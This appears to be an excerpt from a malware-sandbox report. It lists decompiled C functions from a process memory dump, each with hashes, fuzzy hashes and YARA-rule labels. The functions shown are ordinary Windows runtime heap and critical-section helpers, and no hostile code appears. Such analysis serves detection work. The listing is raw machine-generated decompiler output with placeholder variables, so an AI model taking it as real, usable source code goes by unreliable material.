              • Opcode ID: 8b47cd1294966fdf92b2eb7cc101825e0cbb12638a1a0b33f7f9a35caefd926e
              • Instruction ID: afe8e47ab400009d417b44e48f89d4cc237106d2df66a8650550d835e3463048
              • Opcode Fuzzy Hash: 8b47cd1294966fdf92b2eb7cc101825e0cbb12638a1a0b33f7f9a35caefd926e
              • Instruction Fuzzy Hash: 49E0DFB120F2049FEB38EB66D064F3D3798DF42729F1980DDE00A4B102E621F880C25A
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C7D380 Relevance: .0, Instructions: 21COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E04C7D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L04BCE8B0(__ecx, _a4, 0xfff);
					L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




              0x04c7d38a
              0x04c7d39b
              0x04c7d3b1
              0x00000000
              0x04c7d3b6
              0x00000000

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
              • Instruction ID: 505ebf2e998fa1912fb52891bd2d4984e9233c7ba51082dab309a06458c0456d
              • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
              • Instruction Fuzzy Hash: 2FE0C231280204FBEB225E44CC00F797B26DF407A4F104035FE095A690CA79FD91E6C4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BFA185 Relevance: .0, Instructions: 20COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E04BFA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x4cb67e4 >= 0xa) {
					if(_t5 < 0x4cb6800 || _t5 >= 0x4cb6900) {
						return L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E04BE0010(0x4cb67e0, _t5);
				}
			}





              0x04bfa190
              0x04bfa1a6
              0x04bfa1c2
              0x00000000
              0x00000000
              0x00000000
              0x04bfa192
              0x04bfa192
              0x04bfa19f
              0x04bfa19f

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f0ab5c474fc45a0af1dfd48058b00a00989e750634a9f9f1c471ea5931b895a9
              • Instruction ID: 879088d1fcd6043fd9e3352422299083788c08148be9f187b896f885b22a2ad4
              • Opcode Fuzzy Hash: f0ab5c474fc45a0af1dfd48058b00a00989e750634a9f9f1c471ea5931b895a9
              • Instruction Fuzzy Hash: 1FD02BA132000016F61C2710EC64B31221BEBC8708F310C8CF28F1A590DE50FDE8918A
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BF16E0 Relevance: .0, Instructions: 17COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E04BF16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E04BF1710(0x4cb67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L04BE4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





              0x04bf16e8
              0x04bf16ef
              0x04bf16f3
              0x04bf16fe
              0x00000000
              0x04bf1700
              0x04bf170d
              0x04bf170d
              0x04bf16f2
              0x04bf16f2
              0x04bf16f2
              0x04bf16f2

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e40f406b9dbe88e43649fc4610376a91936ff494824d7956efa0e1a9122ba8a3
              • Instruction ID: 7bea75127043ee9a2807350da7653ef44595841e99fa14d53863def6c0898b8f
              • Opcode Fuzzy Hash: e40f406b9dbe88e43649fc4610376a91936ff494824d7956efa0e1a9122ba8a3
              • Instruction Fuzzy Hash: C5D05E71200100E6EA2D5A199C04B142256DB80789F3804D8B20E694C0DFA1FC96E448
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BF35A1 Relevance: .0, Instructions: 12COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E04BF35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E04BDEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






              0x04bf35a1
              0x04bf35a1
              0x04bf35a5
              0x04bf35ab
              0x04bf35ab
              0x04bf35b5
              0x00000000
              0x04bf35c1
              0x04bf35b7

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
              • Instruction ID: e171eb84a129b323caafacb27e37787c29c6fa1e8a9cc0673c25c5153a51d0dd
              • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
              • Instruction Fuzzy Hash: 7ED0A9315012809AEF01AB10CA1876C33F2FF8030CF5830E58A4A0A862C33EBA0ED600
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BDAAB0 Relevance: .0, Instructions: 12COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E04BDAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




              0x04bdaab6
              0x04bdaabb
              0x04c2a442
              0x00000000
              0x04c2a448
              0x04c2a454
              0x04c2a454
              0x04bdaac1
              0x04bdaac1
              0x04bdaac6
              0x04bdaac6

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
              • Instruction ID: ea89450ab055113099d3e3143c25b58b382b618777ef955122d1155909ad82a8
              • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
              • Instruction Fuzzy Hash: D4D0E939352D90CFD716CF1DC554B1573A5FB44B44FD509D0E501CBB61E66DE945CA00
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C4A537 Relevance: .0, Instructions: 11COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E04C4A537(intOrPtr _a4, intOrPtr _a8) {

				return L04BE8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



              0x04c4a553

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
              • Instruction ID: 265db6d00cfa3a57c883bad543d51d593c0f9c4e89070778eec869169d1b04da
              • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
              • Instruction Fuzzy Hash: EEC01232080648BBCB126E82CC00F267B2AEB94B60F008410BA080B5608632E970EA84
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BCDB40 Relevance: .0, Instructions: 11COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E04BCDB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L04BE4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





              0x04bcdb4d
              0x04bcdb54
              0x04bcdb5f
              0x04bcdb56
              0x04bcdb56
              0x04bcdb5c
              0x04bcdb5c

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
              • Instruction ID: c2258d71b3be4d10050bc6e94d3eac6b7ea36e1f4853d5cb84afefe4965f7870
              • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
              • Instruction Fuzzy Hash: ACC08C30280A00AEEB221F20CD01B1036A4FB40B05F4400E06300DA0F0EB78E801EA00
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BCAD30 Relevance: .0, Instructions: 10COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E04BCAD30(intOrPtr _a4) {

				return L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



              0x04bcad49

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
              • Instruction ID: f1ef3ef1f5217ed0f2703938408ead331deac6675480a54233e0f5668bfa559b
              • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
              • Instruction Fuzzy Hash: 57C08C32080248BBC7126A46DD00F117B29E790B60F000020B6040A6618A32E860E588
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BD76E2 Relevance: .0, Instructions: 10COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E04BD76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




              0x04bd76e4
              0x00000000
              0x04bd76f8
              0x04bd76fd

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
              • Instruction ID: bfcee0f9cc6f86fe5e799311593e63f5f4862548f369be233864fd2550e37802
              • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
              • Instruction Fuzzy Hash: B8C08C701421805AEB2A6B08CE20B307650EB08708F4801DCAA01094A1EB68B802C288
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BF36CC Relevance: .0, Instructions: 10COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E04BF36CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L04BE4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



              0x04bf36d2
              0x04bf36e8
              0x04bf36d4
              0x04bf36e5
              0x04bf36e5

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
              • Instruction ID: 7aa2242be31ef3334306e5ee0b36193d027bd1c34c525a496d28d9f54bc24fa4
              • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
              • Instruction Fuzzy Hash: 95C09B75155440FFEB155F30CD51F257294F740A65F6407D47325495F0D679BC44D508
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BE3A1C Relevance: .0, Instructions: 10COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E04BE3A1C(intOrPtr _a4) {
				void* _t5;

				return L04BE4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




              0x04be3a35

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
              • Instruction ID: 0eb9caf5d71e56e375bf7aa1db714a872ce540152864fe672cdf46ce8b483e10
              • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
              • Instruction Fuzzy Hash: B4C04C32180648BBDB126E46DD01F157B69E794B60F154061B6040A5618676ED61D99C
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BE7D50 Relevance: .0, Instructions: 7COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E04BE7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




              0x04be7d56
              0x04be7d5b
              0x04be7d60
              0x04be7d5d
              0x04be7d5d
              0x04be7d5d

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
              • Instruction ID: 37bd35d124c4d81d3f7be24eb7ff792da99c17beb508dc0cd110a3bdb3522d3b
              • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
              • Instruction Fuzzy Hash: 47B09234301941CFCF16DF19C080B2533E8FB84A40B8440D0E400CBA20D729E8009900
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C5FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
              Download Yara Rule
              C-Code - Quality: 53%
              			E04C5FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04C0CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04C55720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04C55720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










              0x04c5fdda
              0x04c5fde2
              0x04c5fde5
              0x04c5fdec
              0x04c5fdfa
              0x04c5fdff
              0x04c5fe0a
              0x04c5fe0f
              0x04c5fe17
              0x04c5fe1e
              0x04c5fe19
              0x04c5fe19
              0x04c5fe19
              0x04c5fe20
              0x04c5fe21
              0x04c5fe22
              0x04c5fe25
              0x04c5fe40

              APIs
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04C5FDFA
              Strings
              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04C5FE01
              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04C5FE2B
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
              • API String ID: 885266447-3903918235
              • Opcode ID: f2cfeab3244d7178dd3b373c4315cfc8dff260ffb5451fedc1013a340e469e20
              • Instruction ID: 372e9c7750aad8a69d6521e6579b015566904fe93eb5c90fd87a2f8ab0b36c1e
              • Opcode Fuzzy Hash: f2cfeab3244d7178dd3b373c4315cfc8dff260ffb5451fedc1013a340e469e20
              • Instruction Fuzzy Hash: E8F0F632200201BFE6291A45DC06F77BF5BEB44770F244354FA68561F1EAA2F8A096F8
              Uniqueness

              Uniqueness Score: -1.00%